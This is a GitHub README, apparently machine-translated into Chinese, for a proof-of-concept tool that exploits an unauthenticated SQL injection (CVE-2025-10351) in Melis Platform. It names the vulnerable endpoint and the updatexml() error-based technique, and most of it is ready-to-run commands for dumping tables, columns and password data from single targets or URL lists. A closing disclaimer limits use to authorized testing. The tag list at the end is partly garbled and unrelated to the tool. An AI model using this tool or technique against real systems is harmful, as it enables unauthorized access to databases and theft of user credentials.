ivansmc00/CVE-2025-10351-POC
GitHub: ivansmc00/CVE-2025-10351-POC
针对 Melis Platform 框架 CVE-2025-10351 SQL 注入漏洞的概念验证工具,支持无认证情况下通过报错型注入提取数据库表结构和数据。
Stars: 1 | Forks: 0
# CVE-2025-10351 POC - SQL 注入漏洞利用 💉



## 🔗 参考资料
- 📄 [MITRE 上的 CVE-2025-10351](https://www.cve.org/CVERecord?id=CVE-2025-10351)
- 📄 [INCIBE(西班牙国家网络安全研究所)关于 Melis Platform 的警告](https://www.incibe.es/incibe-cert/alerta-temprana/avisos/multiples-vulnerabilidades-en-melis-platform)
## 🚀 描述
此 POC 针对以下端点中的 **未经身份验证的报错型 SQL 注入** 漏洞:
```
melis/MelisCms/PageEdition/getTinyTemplates?idPage=
```
它利用 MySQL 中的 `updatexml()` 来提取:
- 表名
- 列名
- 来自特定列或所有列的数据
它还检测可能的 **时间盲注** 向量,以便进一步手动利用。
## 🛠️ 环境要求
使用以下命令安装依赖:
```
pip3 install -r requirements.txt
```
## 🧪 用法
### 基础检查
```
python3 CVE-2025-10351-POC.py -u http://target.com -p 80
```
### 从 URL 列表运行
```
python3 CVE-2025-10351-POC.py -l targets.txt
```
### 提取所有表名
```
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at
```
### 从表中提取所有列名
```
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users
```
### 提取所有列的所有数据
```
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac
```
### 提取特定列
```
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password
```
### 使用代理(不安全模式)、Cookie 和调试模式
```
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug
```
## ⚙️ 选项
| Argument | Description |
|--------------|-----------------------------------------|
| `-u` | 目标 URL |
| `-p` | 端口 (80, 443, 等.) |
| `-l` | 包含 URL 列表的文件 |
| `-s` | 时间盲注测试的延迟时间 (默认: 1s) |
| `-at` | 导出所有表名 |
| `-t` | 指定表名 |
| `-ac` | 导出给定表的所有列 |
| `-c` | 要导出的列名列表(逗号分隔) |
| `--proxy` | Burp 代理 http://127.0.0.1:8080 |
| `--insecure` | 使用代理连接时禁用 TLS 检查 |
| `--cookie` | 用于认证请求的 Cookie |
| `--debug` | 调试模式 |
## 📤 输出
- 提取的表保存至 `tables_extracted.txt`
- 提取的数据保存至 `_data.txt`
## ⚠️ 免责声明
本文档仅用于授权的安全测试和修复。请**勿**对您不拥有或未获得明确测试许可的系统使用此 PoC 或复现步骤。作者不对滥用行为负责。
Made with ❤️ by Manuel Iván San Martín Castillo
标签:CISA项目, CVE, CVE-2025-10351, Exploit, Maven, Melis Platform, PNNL实验室, POC, Python, SQLi, Web安全, 帧ework漏洞, 数字签名, 数据提取, 无后门, 无服务器架构, 时间盲注, 未授权访问, 漏洞验证, 网络安全, 蓝队分析, 逆向工具, 错误注入, 隐私保护